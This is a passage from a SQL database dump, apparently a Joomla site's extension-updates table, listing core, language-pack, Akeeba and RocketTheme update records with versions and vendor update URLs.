(FEF)','','file_fef','file','',1,'1.1.1','','http://cdn.akeebabackup.com/updates/fef.xml','https://www.akeeba.com/download/fef/1-1-1.html',''),(25707,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.4.3FREE','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer/features',''),(25708,101,0,'FOF 3.x Stable','','lib_fof30','library','',1,'3.7.1','','http://cdn.akeebabackup.com/updates/fof3_file.xml','https://www.akeeba.com/download/fof3/3-7-1.html',''),(25709,1,0,'Joomla','','joomla','file','',0,'3.9.23','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(25710,1,0,'Joomla','','joomla','file','',0,'3.9.23','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(25711,1,0,'Joomla','','joomla','file','',0,'3.9.23','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(25712,1,0,'Joomla','','joomla','file','',0,'3.9.23','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(25713,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.5.0.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/7-5-0-1.html',''),(25714,1,0,'Joomla','','joomla','file','',0,'3.9.23','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(25715,1,0,'Joomla','','joomla','file','',0,'3.9.23','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(25716,1,0,'Joomla','','joomla','file','',0,'3.9.23','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(25717,1,0,'Joomla','','joomla','file','',0,'3.9.23','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(25718,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.5.0.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/7-5-0-1.html',''),(25719,1,0,'Joomla','','joomla','file','',0,'3.9.23','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(25720,1,0,'Joomla','','joomla','file','',0,'3.9.23','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(25721,1,0,'Joomla','','joomla','file','',0,'3.9.23','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(25722,1,0,'Joomla','','joomla','file','',0,'3.9.23','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(25723,1,0,'Joomla','','joomla','file','',0,'3.9.23','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(25724,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.5.0.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/7-5-0-1.html',''),(25725,1,0,'Joomla','','joomla','file','',0,'3.9.23','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(25726,1,0,'Joomla','','joomla','file','',0,'3.9.23','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(25727,1,0,'Joomla','','joomla','file','',0,'3.9.23','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(25728,1,0,'Joomla','','joomla','file','',0,'3.9.23','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(25729,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.5.0.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/7-5-0-1.html',''),(25730,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(25731,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(25732,3,0,'French','','pkg_fr-FR','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(25733,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(25734,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(25735,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(25736,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(25737,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(25738,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(25739,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(25740,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(25741,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(25742,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.22.2','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(25743,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(25744,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(25745,3,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(25746,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(25747,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(25748,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(25749,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(25750,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(25751,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(25752,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(25753,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(25754,3,0,'English US','','pkg_en-US','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(25755,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(25756,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(25757,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(25758,3,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(25759,3,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(25760,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(25761,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(25762,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(25763,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(25764,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(25765,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(25766,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(25767,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(25768,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(25769,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(25770,3,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(25771,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(25772,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(25773,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(25774,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(25775,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(25776,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(25777,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(25778,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(25779,20,0,'RokSprocket Module','','mod_roksprocket','module','',0,'2.1.28','0802','http://updates.rockettheme.com/joomla/138/b61e70db','',''),(25780,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/138/2084920890','',''),(25781,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.46','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(25782,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/286/326466299','',''),(25783,20,0,'RokCandy Extension','','rokcandy','plugin','system',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/302/2df8a4e2','',''),(25784,20,0,'RokGallery','','','component','',0,'2.46','0802','http://updates.rockettheme.com/joomla/313/1985305838','',''),(25785,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(25786,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(25787,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/381/337128173','',''),(25788,20,0,'RokCommon','','pkg_rokcommon','package','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/559/1033ef39','',''),(25789,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(25790,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(25791,57,0,'French','','pkg_fr-FR','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(25792,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(25793,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(25794,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(25795,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(25796,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(25797,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(25798,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(25799,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(25800,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(25801,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.22.2','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(25802,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(25803,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(25804,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(25805,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(25806,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(25807,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(25808,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(25809,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(25810,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(25811,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(25812,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(25813,57,0,'English US','','pkg_en-US','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(25814,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(25815,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(25816,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(25817,57,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(25818,57,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(25819,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(25820,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(25821,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(25822,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(25823,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(25824,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(25825,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(25826,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(25827,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(25828,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(25829,57,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(25830,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(25831,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(25832,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(25833,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(25834,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(25835,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(25836,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(25837,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(25838,76,0,'Akeeba Frontend Framework (FEF)','','file_fef','file','',1,'1.1.1','','http://cdn.akeebabackup.com/updates/fef.xml','https://www.akeeba.com/download/fef/1-1-1.html',''),(25839,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.4.3FREE','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer/features',''),(25840,101,0,'FOF 3.x Stable','','lib_fof30','library','',1,'3.7.1','','http://cdn.akeebabackup.com/updates/fof3_file.xml','https://www.akeeba.com/download/fof3/3-7-1.html',''),(25841,1,0,'Joomla','','joomla','file','',0,'3.9.23','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(25842,1,0,'Joomla','','joomla','file','',0,'3.9.23','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(25843,1,0,'Joomla','','joomla','file','',0,'3.9.23','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(25844,1,0,'Joomla','','joomla','file','',0,'3.9.23','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(25845,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.5.0.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/7-5-0-1.html',''),(25846,1,0,'Joomla','','joomla','file','',0,'3.9.23','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(25847,1,0,'Joomla','','joomla','file','',0,'3.9.23','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(25848,1,0,'Joomla','','joomla','file','',0,'3.9.23','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(25849,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.5.0.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/7-5-0-1.html',''),(25850,1,0,'Joomla','','joomla','file','',0,'3.9.23','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(25851,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(25852,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(25853,3,0,'French','','pkg_fr-FR','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(25854,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(25855,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(25856,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(25857,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(25858,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(25859,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(25860,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(25861,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(25862,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(25863,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.22.2','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(25864,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(25865,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(25866,3,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(25867,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(25868,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(25869,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(25870,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(25871,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(25872,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(25873,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(25874,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(25875,3,0,'English US','','pkg_en-US','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(25876,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(25877,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(25878,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(25879,3,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(25880,3,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(25881,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(25882,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(25883,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(25884,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(25885,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(25886,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(25887,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(25888,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(25889,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(25890,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(25891,3,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(25892,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(25893,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(25894,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(25895,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(25896,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(25897,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(25898,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(25899,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(25900,20,0,'RokSprocket Module','','mod_roksprocket','module','',0,'2.1.28','0802','http://updates.rockettheme.com/joomla/138/b61e70db','',''),(25901,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/138/2084920890','',''),(25902,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.46','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(25903,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/286/326466299','',''),(25904,20,0,'RokCandy Extension','','rokcandy','plugin','system',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/302/2df8a4e2','',''),(25905,20,0,'RokGallery','','','component','',0,'2.46','0802','http://updates.rockettheme.com/joomla/313/1985305838','',''),(25906,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(25907,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(25908,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/381/337128173','',''),(25909,20,0,'RokCommon','','pkg_rokcommon','package','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/559/1033ef39','',''),(25910,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(25911,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(25912,57,0,'French','','pkg_fr-FR','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(25913,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(25914,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(25915,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(25916,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(25917,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(25918,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(25919,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(25920,57,0,'Chinese 